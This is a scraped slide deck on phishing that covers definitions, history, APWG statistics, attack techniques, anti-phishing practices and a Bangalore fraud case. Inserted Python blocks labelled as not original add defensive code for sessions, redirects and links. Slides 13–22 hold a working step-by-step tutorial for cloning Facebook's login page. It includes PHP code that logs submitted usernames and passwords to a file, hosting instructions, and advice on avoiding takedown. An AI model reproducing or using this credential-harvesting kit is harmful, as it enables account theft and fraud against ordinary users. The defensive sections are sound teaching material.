Spatium Project Simulation student brief
Spatium Project Simulation student briefSpatium Project Simulation student brief
Spatium Project Simulation student brief
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 

Phishing

  • 2. Agenda 1:- INTRODUCTION,DEFINITION AND DESCRIPTION OF PHISHING 2:- HISTORY AND CURRENT STATUS OF PHISHING 3:- PHISHING TECHNIQUES 4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP BY STEP! 5:- DAMAGED CAUSED BY PHISHING AND ANTIPHISHING 6:-How To Combat Phishing What to do ? And What not to do? 7:- RECENT PHISHING ATTEMPTS,LEGAL RESPONSE AND CASE STUDY
  • 3. DEFINITION AND DESCRIPTION • Phishing is an act of attempt to acquire information such as usernames,passwords, and credit card details,etc of a person or organization illegaly in an electronic communication. • Phishing is committed so that the Phisher may obtain sensitive and valuable information about a consumer, usually with the goal of fraud to obtain the customer bank and other financial information. • Phishing are typically carried out by e-mail spoofing or instant messaging.
  • 4.
  • 5. • In phishing the criminals creates a fake website whose looks and feel are identical to the legitimate one, in which the victims are told to enter their confidential details like username, password or account details. • Phishing technique was described in detail in the year 1987 and this technique was first used in the year 1995 • Phishing is mainly commited ,so that the criminal may obtain sensitive & valuable information about the customer. • Phishing makes high profit with less or small technological investment
  • 6. History  Phreaking + Fishing = Phishing - Phreaking = making phone calls for free back in 70’s • - Fishing = Use bait to lure the target  Phishing in 1995 Target: AOL users Purpose: getting account passwords for free time Threat level: low Techniques: Similar names ( www.ao1.com for www.aol.com ), social engineering  Phishing in 2001 Target: Ebayers and major banks Purpose: getting credit card numbers, accounts Threat level: medium Techniques: Same in 1995, keylogger  Phishing in 2007 Target: Paypal, banks, ebay Purpose: bank accounts Threat level: high Techniques: browser vulnerabilities, link obfuscation
  • 7. Current status of Phishing • • The APWG received 26,150 unique phishing reports. • This total represents the second highest number of phishing reports that the APWG has received in a single month. • • The APWG detected 10,091 unique phishing websites worldwide. • • 148 separate corporate brands were “hijacked” (misused) in phishing schemes (compared to 84 in August 2005v). • • The financial sector was the most heavily targeted for phishing schemes, constituting 92.6 percent of all phishing attacks
  • 8. • • The APWG found 2,303 unique websites that hosted “keylogging.” programs. • • The United States was the country hosting the largest percentage of phishing websites (27.7 percent, compared to 27.9 percent in August 2005), while Canada ranked ninth among countries hosting such websites (2.2 percent, compared to 2.21 percent in August 2005). China remains the second most frequent host of phishing websites (14 percent, compared to 12.15 percent in August 2005), and South Korea the third most frequent host of such sites (9.59 percent, compared to 9.6 percent in August 2005).
  • 9. • A very recent and popular case of phishing is that the chinese phishers are targeting GMAIL account of high ranked official of united states,south korea government and military information & chinese political activities.
  • 10. Phishing Technique  Deceptive - Sending a deceptive email, in bulk, with a “call to action” that demands the recipient click on a link.  Malware-Based - Running malicious software on the user’s machine. Various forms of malware-based phishing are:  Key Loggers & Screen Loggers  Session Hijackers  Web Trojans  Data Theft  DNS-Based - Phishing that interferes with the integrity of the lookup process for a domain name. Forms of DNS-based phishing are:  Hosts file poisoning  Polluting user’s DNS cache  Proxy server compromise
  • 11.  Content-Injection – Inserting malicious content into legitimate site. Three primary types of content-injection phishing:  Hackers can compromise a server through a security vulnerability and replace or augment the legitimate content with malicious content.  Malicious content can be inserted into a site through a cross-site scripting vulnerability. Malicious actions can be performed on a site through a SQL injection vulnerability.
  • 12. • Man-in-the-Middle Phishing - Phisher positions himself between the user and the legitimate site. • Search Engine Phishing - Create web pages for fake products, get the pages indexed by search engines, and wait for users to enter their confidential information as part of an order, sign-up, or balance transfer.
  • 13. Step To Hack Facebook • Step 1: Go to http://www.facebook.com and right-click on the home page and select view page source.
  • 14. • Step 2: Find for something which looks like this :
  • 15. Step 3: Then change the action URL to login.php, now it will look similar to this. Save it as index.html.
  • 16. • Step 4: Open a notepad and paste the following code inside it and save as login.php. <?php header (‘Location: http://www.facebook.com&#8217;); $handle = fopen(“passwords.txt”, “a”); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?> Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the arguments of header function in the above PHP code.
  • 17. • Step 5: Create another blank text file for storing the hacked usernames and passwords and name it as passwords.txt. Now you are done with the setup of phishing page, all you need to do is host it somewhere on internet so that it becomes available to your victim. • Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB free space to host your web pages and free domain. You will have to complete email confirmation step to get your web page running.
  • 18. • Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.
  • 19. • Step 8: Then click on File Manager
  • 20. • Step 9: Now you will see a folder public html in the web based ftp client page, click on the folder and open it.
  • 21. • Step 10: Click on Upload and select all the 3 files and finally click on the green tick to upload them as shown in the image below. • Once you get your files uploaded you can check your page at your registered domain.
  • 22. • The victim’s password will be automatically written into passwords.txt file, just open the file to see the username and password! • Congratulations you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also. • Note: Phishing pages at free hosting services will be immediately deleted, if once detected. So my advice is to use a paid hosting service or else host it on your system.
• 23. DAMAGE CAUSED BY PHISHING • The impact of phishing is both domestic and international, and falls chiefly on the commercial and financial sectors. • Direct financial loss. Phishing is carried out mainly to inflict financial loss on a person or an organization; consumers and businesses may lose anywhere from a few hundred dollars to millions of dollars. • Erosion of public trust in the Internet. Phishing also reduces the public's trust in the Internet.
• 25. • A survey found that 9 out of 10 American adult Internet users have changed their Internet habits because of the threat of identity theft. • 30 percent say they have reduced their overall usage. • 25 percent say they have stopped shopping online, while 29 percent of those who still shop online say they have reduced the frequency of their purchases.
• 26. Anti-Phishing  Anti-Phishing Working Group (APWG) The APWG has more than 2,300 members from over 1,500 companies and agencies worldwide. Member companies include leading security companies such as Symantec, McAfee and VeriSign. Financial industry members include the ING Group, VISA, Mastercard and the American Bankers Association.
• 27. Educate application users  Think before you open  Never click on links in an e-mail, message board or mailing list post  Never submit credentials on forms embedded in e-mails  Inspect the address bar and the SSL certificate  Never open suspicious e-mails  Ensure that the web browser has the latest security patches applied  Install the latest anti-virus packages  Destroy any hard copy of sensitive information  Verify accounts and transactions regularly  Report the scam by phone or e-mail.
• 28.  Formulate and enforce best practices  Authorization controls and access privileges for systems, databases and applications.  Access to any information should be based on the need-to-know principle  Segregation of duties.  Media should be disposed of only after sensitive information has been erased. Reinforce application development / maintenance processes: 1. Web page personalization  Using two pages to authenticate users.  Using client-side persistent cookies. 2. Content validation  Never inherently trust submitted data  Never present submitted data back to an application user without sanitizing it  Always sanitize data before processing or storing it  Check the HTTP Referer header
• 29. 3. Session handling  Make session identifiers long, complicated and difficult to guess.  Set expiry time limits for session IDs and check them on every client request.  The application should be able to revoke active session IDs and must never recycle a session ID.  Any request carrying an invalid session ID should be redirected to the login page.  Never accept session information within a URL.  Protect the session via SSL.  Session data should be submitted as a POST.  After authenticating, a new session ID should be issued (HTTP and HTTPS).  Never let users choose the session ID. 4. Image regulation  Image cycling  Session-bound images
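The session-handling rules on this slide, as an added worked example in Python that is not part of the original presentation: an in-memory session store that issues long random identifiers, checks expiry on every request, revokes identifiers without ever reusing them, rotates the identifier after authentication, and reads the identifier from a cookie only, never from the URL. The class and function names, the 15-minute idle timeout and the cookie name SESSIONID are assumptions chosen for the example.

```python
import secrets
import time

SESSION_TTL_SECONDS = 15 * 60   # assumption: 15-minute sliding idle timeout
SESSION_ID_BYTES = 32           # 256 bits of entropy per identifier
COOKIE_NAME = "SESSIONID"       # assumption: cookie name used by the application


class SessionStore:
    """In-memory session table applying the slide's rules: long random
    identifiers, expiry checked on every request, revocation with no reuse,
    rotation after login, and no client-chosen identifiers."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock (tests can freeze it)
        self._sessions = {}      # sid -> {"user": str | None, "expires": float}
        self._revoked = set()    # identifiers that must never be issued again

    def _new_id(self):
        # secrets.token_urlsafe(32) yields a 43-character random token; the
        # loop guarantees a value that has never been issued before.
        while True:
            sid = secrets.token_urlsafe(SESSION_ID_BYTES)
            if sid not in self._sessions and sid not in self._revoked:
                return sid

    def create(self, user=None):
        """Issue a fresh identifier; callers cannot supply their own."""
        sid = self._new_id()
        self._sessions[sid] = {"user": user,
                               "expires": self._now() + SESSION_TTL_SECONDS}
        return sid

    def lookup(self, sid):
        """Return the live session record, or None (caller redirects to login).
        Expired identifiers are revoked on sight; live ones get a sliding expiry."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if self._now() >= rec["expires"]:
            self.revoke(sid)
            return None
        rec["expires"] = self._now() + SESSION_TTL_SECONDS
        return rec

    def revoke(self, sid):
        """Kill a session; the identifier is remembered so it is never recycled."""
        self._sessions.pop(sid, None)
        self._revoked.add(sid)

    def login(self, sid, user):
        """Rotate the identifier after successful authentication so that a
        pre-authentication identifier known to an attacker (session fixation)
        never becomes an authenticated one."""
        if self.lookup(sid) is not None:
            self.revoke(sid)
        return self.create(user)


def session_cookie_header(sid):
    """Set-Cookie line: Secure (sent over SSL only), HttpOnly (no script
    access), SameSite, and no Max-Age so the browser discards it on close."""
    return f"Set-Cookie: {COOKIE_NAME}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def session_id_from_request(cookies, query):
    """Read the identifier from the cookie only. A session identifier in the
    URL query string leaks through Referer headers, proxy logs and history,
    so a request that carries one there is refused outright."""
    if COOKIE_NAME in query:
        return None
    return cookies.get(COOKIE_NAME)
```

The store keeps revoked identifiers so that the random generator can never hand one out a second time; in a real deployment the same effect is obtained by keying sessions on 256-bit tokens in a shared store and letting the tiny collision probability stand in for the explicit set.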
• 30. 5. URL qualification  Do not reference the redirection URL in the browser's URL  Always maintain a valid, approved list of redirection URLs  Never allow customers to supply their own URLs  Never allow IP addresses to be used in URL information 6. Authentication process  Ensure that a 2-phase login process is in place  Personalize the content  Design a strong token-based authentication 7. Transaction non-repudiation  To ensure the authenticity and integrity of each transaction
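The URL qualification rules above, together with the Referer check from the content validation list two slides earlier, as an added Python example that is not from the original presentation. The application origin https://bank.example, the approved redirection list and the function names are assumptions constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumptions for this example: the application lives at https://bank.example and
# only these exact targets may ever be used as redirection destinations.
APP_ORIGIN = "https://bank.example"
APPROVED_REDIRECTS = {
    "/account/summary",
    "/account/statements",
    "https://help.bank.example/contact",
}
DEFAULT_TARGET = "/account/summary"


def qualify_redirect(candidate):
    """Map a redirect parameter (for example ?next=...) onto the approved list.
    Anything else - customer-supplied hosts, raw IP hosts, user@host tricks,
    protocol-relative //host paths, non-http schemes - falls back to the
    default, so the parameter can never bounce a user to a phishing site."""
    if not candidate:
        return DEFAULT_TARGET
    candidate = candidate.strip()
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return DEFAULT_TARGET                  # javascript:, data:, ...
    if parts.netloc:
        if "@" in parts.netloc:
            return DEFAULT_TARGET              # user@host hides the real host
        try:
            ipaddress.ip_address(parts.hostname or "")
            return DEFAULT_TARGET              # IP addresses never allowed in URLs
        except ValueError:
            pass
    if not parts.netloc and candidate.startswith("/") and not candidate.startswith("//"):
        target = parts.path                    # site-relative path on our own origin
    else:
        target = f"{parts.scheme}://{parts.netloc}{parts.path}"
    # Exact match against the approved list; query strings and fragments are dropped.
    return target if target in APPROVED_REDIRECTS else DEFAULT_TARGET


def referer_is_own_origin(headers):
    """The Referer check from the content validation list: a credential form
    submitted from a phishing page arrives with a foreign Referer, or none.
    A missing header counts as failure here; since browsers strip Referer in
    some privacy modes, production code pairs this with a CSRF token."""
    ref = headers.get("Referer", "")
    if not ref:
        return False
    p = urlsplit(ref)
    return f"{p.scheme}://{p.netloc}".lower() == APP_ORIGIN
```

The first rule on the slide (do not put the redirection URL in the browser's URL at all) is stronger than qualifying a parameter: keep the target server-side and pass only an opaque key, so there is nothing for a phisher to rewrite. `qualify_redirect` is the fallback for the case where a `next`-style parameter already exists and cannot be removed.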
• 31. PREVENTION TO BE TAKEN TO AVOID PHISHING • 1. Prevention: What to Do • Protect your computer with anti-virus software, spyware filters, e-mail filters and firewall programs, and make sure that they are regularly updated. • Ensure that your Internet browser is up to date and security patches are applied. • Avoid responding to any unknown e-mail or giving your financial information in reply to it.
• 32. • Unless the e-mail is digitally signed, treat it as possibly fake. • Phishers typically ask for information such as usernames, passwords, credit card numbers, social security numbers, etc. • Phishing e-mails are typically not personalized, while valid messages from your bank or e-commerce company generally are. • Always ensure that you're using a secure website when submitting credit card or other sensitive information via your web browser.
• 33. • To make sure you're on a secure web server, check the beginning of the web address in your browser's address bar: it should be "https://" rather than just "http://". • Log in to your online accounts regularly; don't leave them untouched for long periods. • Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate. • If anything is suspicious, contact your bank and all card issuers.
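What "inspect the address bar" and "check for https://" amount to in code: an added Python example, not part of the original presentation, that scores a link taken from an e-mail against the checks in the user-education and prevention slides (https scheme, no raw IP host, no user@host trick, a registrable domain the user actually trusts, no brand name hiding inside a foreign host, and no look-alike substitutions such as 0 for o). The trusted-domain list, the confusable table and the function names are constructed assumptions, and the two-label registrable-domain rule is a simplification.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed for this example: the domains this user actually logs in to.
TRUSTED_DOMAINS = {"facebook.com", "mybank.example"}

# Character substitutions commonly used to build look-alike hostnames.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w"}


def registrable_domain(host):
    """Last two labels of the host. A simplification: real code should use the
    Public Suffix List so that names under e.g. co.uk are handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def undo_confusables(name):
    """Reverse the substitutions a look-alike domain relies on (faceb00k -> facebook)."""
    for fake, real in CONFUSABLES.items():
        name = name.replace(fake, real)
    return name


def inspect_link(url):
    """Return the reasons a link fails the address-bar check; an empty list
    means https plus a registrable domain on the trusted list."""
    warnings = []
    p = urlsplit(url.strip())
    host = (p.hostname or "").lower()
    if p.scheme != "https":
        warnings.append("not https")
    if "@" in p.netloc:
        warnings.append("user@host form hides the real host")
    if not host:
        warnings.append("no hostname")
        return warnings
    try:
        ipaddress.ip_address(host)
        warnings.append("raw IP address instead of a domain name")
        return warnings
    except ValueError:
        pass
    domain = registrable_domain(host)
    if domain in TRUSTED_DOMAINS:
        return warnings
    specific = False
    for trusted in sorted(TRUSTED_DOMAINS):
        brand = trusted.split(".")[0]
        if brand in host:                      # e.g. www.facebook.com.verify.tld
            warnings.append(f"'{brand}' appears in the host but the registrable domain is {domain}")
            specific = True
    if undo_confusables(domain) in TRUSTED_DOMAINS:   # e.g. faceb00k.com
        warnings.append(f"{domain} is a look-alike of a trusted domain")
        specific = True
    if not specific:
        warnings.append(f"{domain} is not a trusted domain")
    return warnings
```

The point of the brand check is the one the "what not to do" slide makes: a host such as www.facebook.com.account-verify.tld looks right at a glance, but the part the browser actually resolves and the certificate actually covers is the registrable domain at the end, so that is the only part worth comparing.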
• 35. 2. Prevention: What Not to Do • Don't assume that you can correctly identify a website as legitimate just by looking at it. • Don't use the links in an e-mail to get to any web page if you think the message might not be authentic; instead, log on to the website directly by typing the web address into your browser. • Avoid filling out forms in e-mail messages that ask for personal financial information.
• 36. • You should only communicate information such as credit card numbers or account details via a secure website or over the telephone.
• 37. What does all of the above imply? It is better to be safe now than sorry later.
• 38. Case study Case: fraud committed by the Mumbai mafia in the IT city City: Bangalore State: Karnataka Background • The cyber crime police of Bangalore, after a two-year investigation, have established that the Mumbai mafia is phishing the IT city. • They have arrested three persons in connection with three different incidents. • A CID official of SP rank said that this is a dangerous trend.
• 39.  The cyber crime police station (CCPS) registered around 100 such phishing cases in 2009, but it is difficult for them to trace every case because the fraudsters use benami (proxy) bank accounts to move the money.  The cyber crime police have arrested three persons, all from Mumbai, in connection with this case. • The police said that all the arrested persons are graduates with a good knowledge of computers.
• 40. Investigation • The cyber crime police arrested one Abdul Khan from Mumbai. • The arrested person had transferred Rs 1 lakh (Rs 50,000 on two occasions) from the ICICI account of an IT professional, Abhishek Malvia, a native of Itarsi, Madhya Pradesh.
  • 41. Conclusion • Phishing is a form of criminal conduct that poses increasing threats to consumers, financial institutions, and commercial enterprises in Canada, the United States, and other countries. Because phishing shows no sign of abating, and indeed is likely to continue in newer and more sophisticated forms, law enforcement, other government agencies, and the private sector in both countries will need to cooperate more closely than ever in their efforts to combat phishing, through improved public education, prevention, authentication, and binational and national enforcement efforts.